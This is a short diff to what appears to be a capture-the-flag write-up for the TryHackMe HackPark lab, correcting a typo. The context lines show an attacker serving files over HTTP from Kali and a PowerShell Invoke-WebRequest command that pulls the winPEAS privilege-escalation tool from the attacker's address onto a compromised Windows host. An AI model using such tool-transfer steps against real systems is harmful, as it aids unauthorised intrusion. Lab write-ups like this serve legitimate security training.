pencer-io/pencer-io.github.io/_posts/2021-02-01-ctf-thm-hackpark.md

 kali@kali:~/thm/hackpark$ python3 -m http.server
 ```

-CD in to the temp folder which is writeable by everyone, then sse PowerShell to pull winPEAS over:
+CD in to the temp folder which is writeable by everyone, then use PowerShell to pull winPEAS over:

 ```text
 C:\Windows\temp> PowerShell Invoke-WebRequest -Uri http://10.14.6.200:8000/winPEAS.exe -Outfile winpeas.exe